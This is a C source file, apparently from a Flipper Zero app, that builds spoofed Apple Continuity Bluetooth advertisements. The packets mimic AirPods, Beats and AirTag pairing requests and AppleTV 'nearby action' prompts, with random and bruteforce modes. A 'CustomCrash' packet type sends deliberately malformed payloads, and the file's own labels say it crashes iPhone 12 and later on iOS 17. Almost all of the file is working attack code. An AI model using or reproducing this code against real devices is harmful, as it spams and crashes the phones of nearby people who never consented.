continuity.c 45 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465666768697071727374757677787980818283848586878889909192939495969798991001011021031041051061071081091101111121131141151161171181191201211221231241251261271281291301311321331341351361371381391401411421431441451461471481491501511521531541551561571581591601611621631641651661671681691701711721731741751761771781791801811821831841851861871881891901911921931941951961971981992002012022032042052062072082092102112122132142152162172182192202212222232242252262272282292302312322332342352362372382392402412422432442452462472482492502512522532542552562572582592602612622632642652662672682692702712722732742752762772782792802812822832842852862872882892902912922932942952962972982993003013023033043053063073083093103113123133143153163173183193203213223233243253263273283293303313323333343353363373383393403413423433443453463473483493503513523533543553563573583593603613623633643653663673683693703713723733743753763773783793803813823833843853863873883893903913923933943953963973983994004014024034044054064074084094104114124134144154164174184194204214224234244254264274284294304314324334344354364374384394404414424434444454464474484494504514524534544554564574584594604614624634644654664674684694704714724734744754764774784794804814824834844854864874884894904914924934944954964974984995005015025035045055065075085095105115125135145155165175185195205215225235245255265275285295305315325335345355365375385395405415425435445455465475485495505515525535545555565575585595605615625635645655665675685695705715725735745755765775785795805815825835845855865875885895905915925935945955965975985996006016026036046056066076086096106116126136146156166176186196206216226236246256266276286296306316326336346356366376386396406416426436446456466476486496506516526536546556566576586596606616626636646656666676686696706716726736746756766776786796806816826836846856866876886896906916926936946956966976986997007017027037047057067077087097107117127137147157167177187197207217227237247257267277287297307317327337347357367377387397407417427437447457467477487497507517527537547557567577587597607617627637647657667677687697707717727737747757767777787797807817827837847857867877887897907917927937947957967977987998008018028038048058068078088098108118128138148158168178188198208218228238248258268278288298308318328338348358368378388398408418428438448458468478488498508518528538548558568578588598608618628638648658668678688698708718728738748758768778788798808818828838848858868878888898908918928938948958968978988999009019029039049059069079089099109119129139149159169179189199209219229239249259269279289299309319329339349359369379389399409419429439449459469479489499509519529539549559569579589599609619629639649659669679689699709719729739749759769779789799809819829839849859869879889899909919929939949959969979989991000100110021003100410051006100710081009101010111012101310141015101610171018101910201021102210231024102510261027102810291030103110321033103410351036103710381039104010411042104310441045104610471048104910501051105210531054105510561057105810591060106110621063106410651066106710681069107010711072107310741075107610771078107910801081108210831084108510861087108810891090109110921093109410951096109710981099110011011102110311041105110611071108110911101111111211131114111511161117111811191120112111221123112411251126112711281129113011311132113311341135113611371138113911401141114211431144114511461147114811491150115111521153115411551156115711581159116011611162116311641165116611671168116911701171117211731174117511761177117811791180118111821183118411851186118711881189119011911192119311941195119611971198119912001201120212031204120512061207120812091210121112121213121412151216121712181219122012211222122312241225122612271228122912301231123212331234123512361237123812391240124112421243124412451246124712481249125012511252125312541255125612571258125912601261126212631264126512661267126812691270127112721273
  1. #include "continuity.h"
  2. #include "_protocols.h"
  3. // Hacked together by @Willy-JL
  4. // iOS 17 Crash by @ECTO-1A
  5. // Nearby Action IDs and Documentation at https://github.com/furiousMAC/continuity/
  6. // Proximity Pair IDs from https://github.com/ECTO-1A/AppleJuice/
  7. typedef struct {
  8. uint8_t value;
  9. const char* name;
  10. } ContinuityColor;
  11. static const ContinuityColor colors_white[] = {
  12. {0x00, "White"},
  13. };
  14. static const ContinuityColor colors_airpods_max[] = {
  15. {0x00, "White"},
  16. {0x02, "Red"},
  17. {0x03, "Blue"},
  18. {0x0F, "Black"},
  19. {0x11, "Light Green"},
  20. };
  21. static const ContinuityColor colors_beats_flex[] = {
  22. {0x00, "White"},
  23. {0x01, "Black"},
  24. };
  25. static const ContinuityColor colors_beats_solo_3[] = {
  26. {0x00, "White"},
  27. {0x01, "Black"},
  28. {0x6, "Gray"},
  29. {0x7, "Gold/White"},
  30. {0x8, "Rose Gold"},
  31. {0x09, "Black"},
  32. {0xE, "Violet/White"},
  33. {0xF, "Bright Red"},
  34. {0x12, "Dark Red"},
  35. {0x13, "Swamp Green"},
  36. {0x14, "Dark Gray"},
  37. {0x15, "Dark Blue"},
  38. {0x1D, "Rose Gold 2"},
  39. {0x20, "Blue/Green"},
  40. {0x21, "Purple/Orange"},
  41. {0x22, "Deep Blue/ Light blue"},
  42. {0x23, "Magenta/Light Fuchsia"},
  43. {0x25, "Black/Red"},
  44. {0x2A, "Gray / Disney LTD"},
  45. {0x2E, "Pinkish white"},
  46. {0x3D, "Red/Blue"},
  47. {0x3E, "Yellow/Blue"},
  48. {0x3F, "White/Red"},
  49. {0x40, "Purple/White"},
  50. {0x5B, "Gold"},
  51. {0x5C, "Silver"},
  52. };
  53. static const ContinuityColor colors_powerbeats_3[] = {
  54. {0x00, "White"},
  55. {0x01, "Black"},
  56. {0x0B, "Gray/Blue"},
  57. {0x0C, "Gray/Red"},
  58. {0x0D, "Gray/Green"},
  59. {0x12, "Red"},
  60. {0x13, "Swamp Green"},
  61. {0x14, "Gray"},
  62. {0x15, "Deep Blue"},
  63. {0x17, "Dark with Gold Logo"},
  64. };
  65. static const ContinuityColor colors_powerbeats_pro[] = {
  66. {0x00, "White"},
  67. {0x02, "Yellowish Green"},
  68. {0x03, "Blue"},
  69. {0x04, "Black"},
  70. {0x05, "Pink"},
  71. {0x06, "Red"},
  72. {0x0B, "Gray ?"},
  73. {0x0D, "Sky Blue"},
  74. };
  75. static const ContinuityColor colors_beats_solo_pro[] = {
  76. {0x00, "White"},
  77. {0x01, "Black"},
  78. };
  79. static const ContinuityColor colors_beats_studio_buds[] = {
  80. {0x00, "White"},
  81. {0x01, "Black"},
  82. {0x02, "Red"},
  83. {0x03, "Blue"},
  84. {0x04, "Pink"},
  85. {0x06, "Silver"},
  86. };
  87. static const ContinuityColor colors_beats_x[] = {
  88. {0x00, "White"},
  89. {0x01, "Black"},
  90. {0x02, "Blue"},
  91. {0x05, "Gray"},
  92. {0x1D, "Pink"},
  93. {0x25, "Dark/Red"},
  94. };
  95. static const ContinuityColor colors_beats_studio_3[] = {
  96. {0x00, "White"},
  97. {0x01, "Black"},
  98. {0x02, "Red"},
  99. {0x03, "Blue"},
  100. {0x18, "Shadow Gray"},
  101. {0x19, "Desert Sand"},
  102. {0x25, "Black / Red"},
  103. {0x26, "Midnight Black"},
  104. {0x27, "Desert Sand 2"},
  105. {0x28, "Gray"},
  106. {0x29, "Clear blue/ gold"},
  107. {0x42, "Green Forest camo"},
  108. {0x43, "White Camo"},
  109. };
  110. static const ContinuityColor colors_beats_studio_pro[] = {
  111. {0x00, "White"},
  112. {0x01, "Black"},
  113. };
  114. static const ContinuityColor colors_beats_fit_pro[] = {
  115. {0x00, "White"},
  116. {0x01, "Black"},
  117. {0x02, "Pink"},
  118. {0x03, "Grey/White"},
  119. {0x04, "Full Pink"},
  120. {0x05, "Neon Green"},
  121. {0x06, "Night Blue"},
  122. {0x07, "Light Pink"},
  123. {0x08, "Brown"},
  124. {0x09, "Dark Brown"},
  125. };
  126. static const ContinuityColor colors_beats_studio_buds_[] = {
  127. {0x00, "Black"},
  128. {0x01, "White"},
  129. {0x02, "Transparent"},
  130. {0x03, "Silver"},
  131. {0x04, "Pink"},
  132. };
  133. static const struct {
  134. uint16_t value;
  135. const char* name;
  136. const ContinuityColor* colors;
  137. const uint8_t colors_count;
  138. } pp_models[] = {
  139. {0x0E20, "AirPods Pro", colors_white, COUNT_OF(colors_white)},
  140. {0x0A20, "AirPods Max", colors_airpods_max, COUNT_OF(colors_airpods_max)},
  141. {0x0055, "Airtag", colors_white, COUNT_OF(colors_white)},
  142. {0x0030, "Hermes Airtag", colors_white, COUNT_OF(colors_white)},
  143. {0x0220, "AirPods", colors_white, COUNT_OF(colors_white)},
  144. {0x0F20, "AirPods 2nd Gen", colors_white, COUNT_OF(colors_white)},
  145. {0x1320, "AirPods 3rd Gen", colors_white, COUNT_OF(colors_white)},
  146. {0x1420, "AirPods Pro 2nd Gen", colors_white, COUNT_OF(colors_white)},
  147. {0x1020, "Beats Flex", colors_beats_flex, COUNT_OF(colors_beats_flex)},
  148. {0x0620, "Beats Solo 3", colors_beats_solo_3, COUNT_OF(colors_beats_solo_3)},
  149. {0x0320, "Powerbeats 3", colors_powerbeats_3, COUNT_OF(colors_powerbeats_3)},
  150. {0x0B20, "Powerbeats Pro", colors_powerbeats_pro, COUNT_OF(colors_powerbeats_pro)},
  151. {0x0C20, "Beats Solo Pro", colors_beats_solo_pro, COUNT_OF(colors_beats_solo_pro)},
  152. {0x1120, "Beats Studio Buds", colors_beats_studio_buds, COUNT_OF(colors_beats_studio_buds)},
  153. {0x0520, "Beats X", colors_beats_x, COUNT_OF(colors_beats_x)},
  154. {0x0920, "Beats Studio 3", colors_beats_studio_3, COUNT_OF(colors_beats_studio_3)},
  155. {0x1720, "Beats Studio Pro", colors_beats_studio_pro, COUNT_OF(colors_beats_studio_pro)},
  156. {0x1220, "Beats Fit Pro", colors_beats_fit_pro, COUNT_OF(colors_beats_fit_pro)},
  157. {0x1620, "Beats Studio Buds+", colors_beats_studio_buds_, COUNT_OF(colors_beats_studio_buds_)},
  158. };
  159. static const uint8_t pp_models_count = COUNT_OF(pp_models);
  160. static const struct {
  161. uint8_t value;
  162. const char* name;
  163. } pp_prefixes[] = {
  164. {0x07, "New Device"},
  165. {0x01, "Not Your Device"},
  166. {0x05, "New Airtag"},
  167. };
  168. static const uint8_t pp_prefixes_count = COUNT_OF(pp_prefixes);
  169. static const struct {
  170. uint8_t value;
  171. const char* name;
  172. } na_actions[] = {
  173. {0x13, "AppleTV AutoFill"},
  174. {0x24, "Apple Vision Pro"},
  175. {0x27, "AppleTV Connecting..."},
  176. {0x20, "Join This AppleTV?"},
  177. {0x19, "AppleTV Audio Sync"},
  178. {0x1E, "AppleTV Color Balance"},
  179. {0x09, "Setup New iPhone"},
  180. {0x02, "Transfer Phone Number"},
  181. {0x0B, "HomePod Setup"},
  182. {0x01, "Setup New AppleTV"},
  183. {0x06, "Pair AppleTV"},
  184. {0x0D, "HomeKit AppleTV Setup"},
  185. {0x2B, "AppleID for AppleTV?"},
  186. };
  187. static const uint8_t na_actions_count = COUNT_OF(na_actions);
  188. static const char* type_names[ContinuityTypeCOUNT] = {
  189. [ContinuityTypeAirDrop] = "AirDrop",
  190. [ContinuityTypeProximityPair] = "Continuity Pair",
  191. [ContinuityTypeAirplayTarget] = "Airplay Target",
  192. [ContinuityTypeHandoff] = "Handoff",
  193. [ContinuityTypeTetheringSource] = "Tethering Source",
  194. [ContinuityTypeNearbyAction] = "Continuity Action",
  195. [ContinuityTypeNearbyInfo] = "Nearby Info",
  196. [ContinuityTypeCustomCrash] = "Continuity Custom",
  197. };
  198. static const char* get_name(const Payload* payload) {
  199. const ContinuityCfg* cfg = &payload->cfg.continuity;
  200. return type_names[cfg->type];
  201. }
  202. #define HEADER_LEN (6) // 1 Size + 1 AD Type + 2 Company ID + 1 Continuity Type + 1 Continuity Size
  203. static uint8_t packet_sizes[ContinuityTypeCOUNT] = {
  204. [ContinuityTypeAirDrop] = HEADER_LEN + 18,
  205. [ContinuityTypeProximityPair] = HEADER_LEN + 25,
  206. [ContinuityTypeAirplayTarget] = HEADER_LEN + 6,
  207. [ContinuityTypeHandoff] = HEADER_LEN + 14,
  208. [ContinuityTypeTetheringSource] = HEADER_LEN + 6,
  209. [ContinuityTypeNearbyAction] = HEADER_LEN + 5,
  210. [ContinuityTypeNearbyInfo] = HEADER_LEN + 5,
  211. [ContinuityTypeCustomCrash] = HEADER_LEN + 11,
  212. };
  213. static void make_packet(uint8_t* _size, uint8_t** _packet, Payload* payload) {
  214. ContinuityCfg* cfg = payload ? &payload->cfg.continuity : NULL;
  215. ContinuityType type;
  216. if(cfg && cfg->type != 0x00) {
  217. type = cfg->type;
  218. } else {
  219. const ContinuityType types[] = {
  220. ContinuityTypeProximityPair,
  221. ContinuityTypeNearbyAction,
  222. ContinuityTypeCustomCrash,
  223. };
  224. type = types[rand() % COUNT_OF(types)];
  225. }
  226. uint8_t size = packet_sizes[type];
  227. uint8_t* packet = malloc(size);
  228. uint8_t i = 0;
  229. packet[i++] = size - 1; // Size
  230. packet[i++] = 0xFF; // AD Type (Manufacturer Specific)
  231. packet[i++] = 0x4C; // Company ID (Apple, Inc.)
  232. packet[i++] = 0x00; // ...
  233. packet[i++] = type; // Continuity Type
  234. packet[i] = size - i - 1; // Continuity Size
  235. i++;
  236. switch(type) {
  237. case ContinuityTypeAirDrop: {
  238. packet[i++] = 0x00; // Zeros
  239. packet[i++] = 0x00; // ...
  240. packet[i++] = 0x00; // ...
  241. packet[i++] = 0x00; // ...
  242. packet[i++] = 0x00; // ...
  243. packet[i++] = 0x00; // ...
  244. packet[i++] = 0x00; // ...
  245. packet[i++] = 0x00; // ...
  246. packet[i++] = 0x01; // Version
  247. packet[i++] = (rand() % 256); // AppleID
  248. packet[i++] = (rand() % 256); // ...
  249. packet[i++] = (rand() % 256); // Phone Number
  250. packet[i++] = (rand() % 256); // ...
  251. packet[i++] = (rand() % 256); // Email
  252. packet[i++] = (rand() % 256); // ...
  253. packet[i++] = (rand() % 256); // Email2
  254. packet[i++] = (rand() % 256); // ...
  255. packet[i++] = 0x00; // Zero
  256. break;
  257. }
  258. case ContinuityTypeProximityPair: {
  259. uint16_t model;
  260. uint8_t color;
  261. switch(payload ? payload->mode : PayloadModeRandom) {
  262. case PayloadModeRandom:
  263. default: {
  264. uint8_t model_index = rand() % pp_models_count;
  265. uint8_t color_index = rand() % pp_models[model_index].colors_count;
  266. model = pp_models[model_index].value;
  267. color = pp_models[model_index].colors[color_index].value;
  268. break;
  269. }
  270. case PayloadModeValue:
  271. model = cfg->data.proximity_pair.model;
  272. color = cfg->data.proximity_pair.color;
  273. break;
  274. case PayloadModeBruteforce:
  275. switch(cfg->data.proximity_pair.bruteforce_mode) {
  276. case ContinuityPpBruteforceModel:
  277. default:
  278. model = cfg->data.proximity_pair.model = payload->bruteforce.value;
  279. color = cfg->data.proximity_pair.color;
  280. break;
  281. case ContinuityPpBruteforceColor:
  282. model = cfg->data.proximity_pair.model;
  283. color = cfg->data.proximity_pair.color = payload->bruteforce.value;
  284. break;
  285. }
  286. break;
  287. }
  288. uint8_t prefix;
  289. if(cfg && cfg->data.proximity_pair.prefix != 0x00) {
  290. prefix = cfg->data.proximity_pair.prefix;
  291. } else {
  292. if(model == 0x0055 || model == 0x0030)
  293. prefix = 0x05;
  294. else
  295. prefix = 0x01;
  296. }
  297. packet[i++] = prefix; // Prefix (paired 0x01 new 0x07 airtag 0x05)
  298. packet[i++] = (model >> 0x08) & 0xFF; // Device Model
  299. packet[i++] = (model >> 0x00) & 0xFF; // ...
  300. packet[i++] = 0x55; // Status
  301. packet[i++] = ((rand() % 10) << 4) + (rand() % 10); // Buds Battery Level
  302. packet[i++] = ((rand() % 8) << 4) + (rand() % 10); // Charing Status and Battery Case Level
  303. packet[i++] = (rand() % 256); // Lid Open Counter
  304. packet[i++] = color; // Device Color
  305. packet[i++] = 0x00;
  306. furi_hal_random_fill_buf(&packet[i], 16); // Encrypted Payload
  307. i += 16;
  308. break;
  309. }
  310. case ContinuityTypeAirplayTarget: {
  311. packet[i++] = (rand() % 256); // Flags
  312. packet[i++] = (rand() % 256); // Configuration Seed
  313. packet[i++] = (rand() % 256); // IPv4 Address
  314. packet[i++] = (rand() % 256); // ...
  315. packet[i++] = (rand() % 256); // ...
  316. packet[i++] = (rand() % 256); // ...
  317. break;
  318. }
  319. case ContinuityTypeHandoff: {
  320. packet[i++] = 0x01; // Version
  321. packet[i++] = (rand() % 256); // Initialization Vector
  322. packet[i++] = (rand() % 256); // ...
  323. packet[i++] = (rand() % 256); // AES-GCM Auth Tag
  324. packet[i++] = (rand() % 256); // Encrypted Payload
  325. packet[i++] = (rand() % 256); // ...
  326. packet[i++] = (rand() % 256); // ...
  327. packet[i++] = (rand() % 256); // ...
  328. packet[i++] = (rand() % 256); // ...
  329. packet[i++] = (rand() % 256); // ...
  330. packet[i++] = (rand() % 256); // ...
  331. packet[i++] = (rand() % 256); // ...
  332. packet[i++] = (rand() % 256); // ...
  333. packet[i++] = (rand() % 256); // ...
  334. break;
  335. }
  336. case ContinuityTypeTetheringSource: {
  337. packet[i++] = 0x01; // Version
  338. packet[i++] = (rand() % 256); // Flags
  339. packet[i++] = (rand() % 101); // Battery Life
  340. packet[i++] = 0x00; // Cell Service Type
  341. packet[i++] = (rand() % 8); // ...
  342. packet[i++] = (rand() % 5); // Cell Service Strength
  343. break;
  344. }
  345. case ContinuityTypeNearbyAction: {
  346. uint8_t action;
  347. switch(payload ? payload->mode : PayloadModeRandom) {
  348. case PayloadModeRandom:
  349. default:
  350. action = na_actions[rand() % na_actions_count].value;
  351. break;
  352. case PayloadModeValue:
  353. action = cfg->data.nearby_action.action;
  354. break;
  355. case PayloadModeBruteforce:
  356. action = cfg->data.nearby_action.action = payload->bruteforce.value;
  357. break;
  358. }
  359. uint8_t flags;
  360. if(cfg && cfg->data.nearby_action.flags != 0x00) {
  361. flags = cfg->data.nearby_action.flags;
  362. } else {
  363. flags = 0xC0;
  364. if(action == 0x20 && rand() % 2) flags--; // More spam for 'Join This AppleTV?'
  365. if(action == 0x09 && rand() % 2) flags = 0x40; // Glitched 'Setup New Device'
  366. }
  367. packet[i++] = flags; // Action Flags
  368. packet[i++] = action; // Action Type
  369. furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag
  370. i += 3;
  371. break;
  372. }
  373. case ContinuityTypeNearbyInfo: {
  374. packet[i++] = ((rand() % 16) << 4) + (rand() % 16); // Status Flags and Action Code
  375. packet[i++] = (rand() % 256); // Status Flags
  376. packet[i++] = (rand() % 256); // Authentication Tag
  377. packet[i++] = (rand() % 256); // ...
  378. packet[i++] = (rand() % 256); // ...
  379. break;
  380. }
  381. case ContinuityTypeCustomCrash: {
  382. // Found by @ECTO-1A
  383. uint8_t action = na_actions[rand() % na_actions_count].value;
  384. uint8_t flags = 0xC0;
  385. if(action == 0x20 && rand() % 2) flags--; // More spam for 'Join This AppleTV?'
  386. if(action == 0x09 && rand() % 2) flags = 0x40; // Glitched 'Setup New Device'
  387. i -= 2; // Override segment header
  388. packet[i++] = ContinuityTypeNearbyAction; // Continuity Type
  389. packet[i++] = 5; // Continuity Size
  390. packet[i++] = flags; // Action Flags
  391. packet[i++] = action; // Action Type
  392. furi_hal_random_fill_buf(&packet[i], 3); // Authentication Tag
  393. i += 3;
  394. packet[i++] = 0x00; // Additional Action Data Terminator (?)
  395. packet[i++] = 0x00; // ...
  396. packet[i++] = ContinuityTypeNearbyInfo; // Continuity Type (?)
  397. furi_hal_random_fill_buf(&packet[i], 3); // Continuity Size (?) + Shenanigans (???)
  398. i += 3;
  399. break;
  400. }
  401. default:
  402. break;
  403. }
  404. *_size = size;
  405. *_packet = packet;
  406. }
  407. enum {
  408. _ConfigPpExtraStart = ConfigExtraStart,
  409. ConfigPpModel,
  410. ConfigPpColor,
  411. ConfigPpPrefix,
  412. ConfigPpCOUNT,
  413. };
  414. enum {
  415. _ConfigNaExtraStart = ConfigExtraStart,
  416. ConfigNaAction,
  417. ConfigNaFlags,
  418. ConfigNaCOUNT,
  419. };
  420. enum {
  421. _ConfigCcExtraStart = ConfigExtraStart,
  422. ConfigCcInfoLock,
  423. ConfigCcInfoDevice,
  424. ConfigCcCOUNT,
  425. };
  426. static void config_callback(void* _ctx, uint32_t index) {
  427. Ctx* ctx = _ctx;
  428. Payload* payload = &ctx->attack->payload;
  429. ContinuityCfg* cfg = &payload->cfg.continuity;
  430. scene_manager_set_scene_state(ctx->scene_manager, SceneConfig, index);
  431. switch(cfg->type) {
  432. case ContinuityTypeProximityPair: {
  433. switch(index) {
  434. case ConfigPpModel:
  435. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpModel);
  436. break;
  437. case ConfigPpColor:
  438. if(payload->mode != PayloadModeRandom)
  439. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpColor);
  440. break;
  441. case ConfigPpPrefix:
  442. scene_manager_next_scene(ctx->scene_manager, SceneContinuityPpPrefix);
  443. break;
  444. default:
  445. ctx->fallback_config_enter(ctx, index);
  446. break;
  447. }
  448. break;
  449. }
  450. case ContinuityTypeNearbyAction: {
  451. switch(index) {
  452. case ConfigNaAction:
  453. scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaAction);
  454. break;
  455. case ConfigNaFlags:
  456. scene_manager_next_scene(ctx->scene_manager, SceneContinuityNaFlags);
  457. break;
  458. default:
  459. ctx->fallback_config_enter(ctx, index);
  460. break;
  461. }
  462. break;
  463. }
  464. case ContinuityTypeCustomCrash: {
  465. switch(index) {
  466. case ConfigCcInfoLock:
  467. case ConfigCcInfoDevice:
  468. break;
  469. default:
  470. ctx->fallback_config_enter(ctx, index);
  471. break;
  472. }
  473. break;
  474. }
  475. default:
  476. ctx->fallback_config_enter(ctx, index);
  477. break;
  478. }
  479. }
  480. static void pp_model_changed(VariableItem* item) {
  481. Ctx* ctx = variable_item_get_context(item);
  482. Payload* payload = &ctx->attack->payload;
  483. ContinuityCfg* cfg = &payload->cfg.continuity;
  484. uint8_t index = variable_item_get_current_value_index(item);
  485. const char* color_name = NULL;
  486. char color_name_buf[3];
  487. uint8_t colors_count;
  488. uint8_t value_index_color;
  489. if(index) {
  490. index--;
  491. if(payload->mode != PayloadModeBruteforce ||
  492. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceModel)
  493. payload->mode = PayloadModeValue;
  494. cfg->data.proximity_pair.model = pp_models[index].value;
  495. variable_item_set_current_value_text(item, pp_models[index].name);
  496. colors_count = pp_models[index].colors_count;
  497. if(payload->mode == PayloadModeValue) {
  498. for(uint8_t j = 0; j < colors_count; j++) {
  499. if(cfg->data.proximity_pair.color == pp_models[index].colors[j].value) {
  500. color_name = pp_models[index].colors[j].name;
  501. value_index_color = j;
  502. break;
  503. }
  504. }
  505. if(!color_name) {
  506. snprintf(
  507. color_name_buf, sizeof(color_name_buf), "%02X", cfg->data.proximity_pair.color);
  508. color_name = color_name_buf;
  509. value_index_color = colors_count;
  510. }
  511. } else {
  512. color_name = "Bruteforce";
  513. value_index_color = colors_count;
  514. }
  515. } else {
  516. payload->mode = PayloadModeRandom;
  517. variable_item_set_current_value_text(item, "Random");
  518. color_name = "Random";
  519. colors_count = 1;
  520. value_index_color = 0;
  521. }
  522. item = variable_item_list_get(ctx->variable_item_list, ConfigPpColor);
  523. variable_item_set_values_count(item, colors_count);
  524. variable_item_set_current_value_index(item, value_index_color);
  525. variable_item_set_current_value_text(item, color_name);
  526. }
  527. static void pp_color_changed(VariableItem* item) {
  528. Payload* payload = variable_item_get_context(item);
  529. ContinuityCfg* cfg = &payload->cfg.continuity;
  530. uint8_t index = variable_item_get_current_value_index(item);
  531. if(payload->mode != PayloadModeBruteforce ||
  532. cfg->data.proximity_pair.bruteforce_mode == ContinuityPpBruteforceColor)
  533. payload->mode = PayloadModeValue;
  534. uint8_t model_index = 0;
  535. for(; model_index < pp_models_count; model_index++) {
  536. if(cfg->data.proximity_pair.model == pp_models[model_index].value) break;
  537. }
  538. cfg->data.proximity_pair.color = pp_models[model_index].colors[index].value;
  539. variable_item_set_current_value_text(item, pp_models[model_index].colors[index].name);
  540. }
  541. static void pp_prefix_changed(VariableItem* item) {
  542. Payload* payload = variable_item_get_context(item);
  543. ContinuityCfg* cfg = &payload->cfg.continuity;
  544. uint8_t index = variable_item_get_current_value_index(item);
  545. if(index) {
  546. index--;
  547. cfg->data.proximity_pair.prefix = pp_prefixes[index].value;
  548. variable_item_set_current_value_text(item, pp_prefixes[index].name);
  549. } else {
  550. cfg->data.proximity_pair.prefix = 0x00;
  551. variable_item_set_current_value_text(item, "Auto");
  552. }
  553. }
  554. static void na_action_changed(VariableItem* item) {
  555. Payload* payload = variable_item_get_context(item);
  556. ContinuityCfg* cfg = &payload->cfg.continuity;
  557. uint8_t index = variable_item_get_current_value_index(item);
  558. if(index) {
  559. index--;
  560. payload->mode = PayloadModeValue;
  561. cfg->data.nearby_action.action = na_actions[index].value;
  562. variable_item_set_current_value_text(item, na_actions[index].name);
  563. } else {
  564. payload->mode = PayloadModeRandom;
  565. variable_item_set_current_value_text(item, "Random");
  566. }
  567. }
  568. static void extra_config(Ctx* ctx) {
  569. Payload* payload = &ctx->attack->payload;
  570. ContinuityCfg* cfg = &payload->cfg.continuity;
  571. VariableItemList* list = ctx->variable_item_list;
  572. VariableItem* item;
  573. uint8_t value_index;
  574. switch(cfg->type) {
  575. case ContinuityTypeProximityPair: {
  576. item =
  577. variable_item_list_add(list, "Model Code", pp_models_count + 1, pp_model_changed, ctx);
  578. const char* model_name = NULL;
  579. char model_name_buf[5];
  580. const char* color_name = NULL;
  581. char color_name_buf[3];
  582. uint8_t colors_count;
  583. uint8_t value_index_color;
  584. switch(payload->mode) {
  585. case PayloadModeRandom:
  586. default:
  587. model_name = "Random";
  588. value_index = 0;
  589. color_name = "Random";
  590. colors_count = 1;
  591. value_index_color = 0;
  592. break;
  593. case PayloadModeValue:
  594. for(uint8_t i = 0; i < pp_models_count; i++) {
  595. if(cfg->data.proximity_pair.model == pp_models[i].value) {
  596. model_name = pp_models[i].name;
  597. value_index = i + 1;
  598. colors_count = pp_models[i].colors_count;
  599. for(uint8_t j = 0; j < colors_count; j++) {
  600. if(cfg->data.proximity_pair.color == pp_models[i].colors[j].value) {
  601. color_name = pp_models[i].colors[j].name;
  602. value_index_color = j;
  603. break;
  604. }
  605. }
  606. break;
  607. }
  608. }
  609. if(!model_name) {
  610. snprintf(
  611. model_name_buf, sizeof(model_name_buf), "%04X", cfg->data.proximity_pair.model);
  612. model_name = model_name_buf;
  613. value_index = pp_models_count + 1;
  614. colors_count = 0;
  615. }
  616. if(!color_name) {
  617. snprintf(
  618. color_name_buf, sizeof(color_name_buf), "%02X", cfg->data.proximity_pair.color);
  619. color_name = color_name_buf;
  620. value_index_color = colors_count;
  621. }
  622. break;
  623. case PayloadModeBruteforce:
  624. switch(cfg->data.proximity_pair.bruteforce_mode) {
  625. case ContinuityPpBruteforceModel:
  626. default:
  627. model_name = "Bruteforce";
  628. value_index = pp_models_count + 1;
  629. snprintf(
  630. color_name_buf, sizeof(color_name_buf), "%02X", cfg->data.proximity_pair.color);
  631. color_name = color_name_buf;
  632. colors_count = 1;
  633. value_index_color = 0;
  634. break;
  635. case ContinuityPpBruteforceColor:
  636. for(uint8_t i = 0; i < pp_models_count; i++) {
  637. if(cfg->data.proximity_pair.model == pp_models[i].value) {
  638. model_name = pp_models[i].name;
  639. value_index = i + 1;
  640. colors_count = pp_models[i].colors_count;
  641. break;
  642. }
  643. }
  644. if(!model_name) {
  645. snprintf(
  646. model_name_buf,
  647. sizeof(model_name_buf),
  648. "%04X",
  649. cfg->data.proximity_pair.model);
  650. model_name = model_name_buf;
  651. value_index = pp_models_count + 1;
  652. colors_count = 0;
  653. }
  654. color_name = "Bruteforce";
  655. value_index_color = colors_count;
  656. break;
  657. }
  658. break;
  659. }
  660. variable_item_set_current_value_index(item, value_index);
  661. variable_item_set_current_value_text(item, model_name);
  662. item =
  663. variable_item_list_add(list, "Device Color", colors_count, pp_color_changed, payload);
  664. variable_item_set_current_value_index(item, value_index_color);
  665. variable_item_set_current_value_text(item, color_name);
  666. item = variable_item_list_add(
  667. list, "Prefix", pp_prefixes_count + 1, pp_prefix_changed, payload);
  668. const char* prefix_name = NULL;
  669. char prefix_name_buf[3];
  670. if(cfg->data.proximity_pair.prefix == 0x00) {
  671. prefix_name = "Auto";
  672. value_index = 0;
  673. } else {
  674. for(uint8_t i = 0; i < pp_prefixes_count; i++) {
  675. if(cfg->data.proximity_pair.prefix == pp_prefixes[i].value) {
  676. prefix_name = pp_prefixes[i].name;
  677. value_index = i + 1;
  678. break;
  679. }
  680. }
  681. if(!prefix_name) {
  682. snprintf(
  683. prefix_name_buf,
  684. sizeof(prefix_name_buf),
  685. "%02X",
  686. cfg->data.proximity_pair.prefix);
  687. prefix_name = prefix_name_buf;
  688. value_index = pp_prefixes_count + 1;
  689. }
  690. }
  691. variable_item_set_current_value_index(item, value_index);
  692. variable_item_set_current_value_text(item, prefix_name);
  693. break;
  694. }
  695. case ContinuityTypeNearbyAction: {
  696. item = variable_item_list_add(
  697. list, "Action Type", na_actions_count + 1, na_action_changed, payload);
  698. const char* action_name = NULL;
  699. char action_name_buf[3];
  700. switch(payload->mode) {
  701. case PayloadModeRandom:
  702. default:
  703. action_name = "Random";
  704. value_index = 0;
  705. break;
  706. case PayloadModeValue:
  707. for(uint8_t i = 0; i < na_actions_count; i++) {
  708. if(cfg->data.nearby_action.action == na_actions[i].value) {
  709. action_name = na_actions[i].name;
  710. value_index = i + 1;
  711. break;
  712. }
  713. }
  714. if(!action_name) {
  715. snprintf(
  716. action_name_buf,
  717. sizeof(action_name_buf),
  718. "%02X",
  719. cfg->data.nearby_action.action);
  720. action_name = action_name_buf;
  721. value_index = na_actions_count + 1;
  722. }
  723. break;
  724. case PayloadModeBruteforce:
  725. action_name = "Bruteforce";
  726. value_index = na_actions_count + 1;
  727. break;
  728. }
  729. variable_item_set_current_value_index(item, value_index);
  730. variable_item_set_current_value_text(item, action_name);
  731. item = variable_item_list_add(list, "Flags", 0, NULL, NULL);
  732. const char* flags_name = NULL;
  733. char flags_name_buf[3];
  734. if(cfg->data.nearby_action.flags == 0x00) {
  735. flags_name = "Auto";
  736. } else {
  737. snprintf(
  738. flags_name_buf, sizeof(flags_name_buf), "%02X", cfg->data.nearby_action.flags);
  739. flags_name = flags_name_buf;
  740. }
  741. variable_item_set_current_value_text(item, flags_name);
  742. break;
  743. }
  744. case ContinuityTypeCustomCrash: {
  745. variable_item_list_add(list, "Lock+unlock helps to crash", 0, NULL, NULL);
  746. variable_item_list_add(list, "Works on iPhone 12 and up", 0, NULL, NULL);
  747. break;
  748. }
  749. default:
  750. break;
  751. }
  752. variable_item_list_set_enter_callback(list, config_callback, ctx);
  753. }
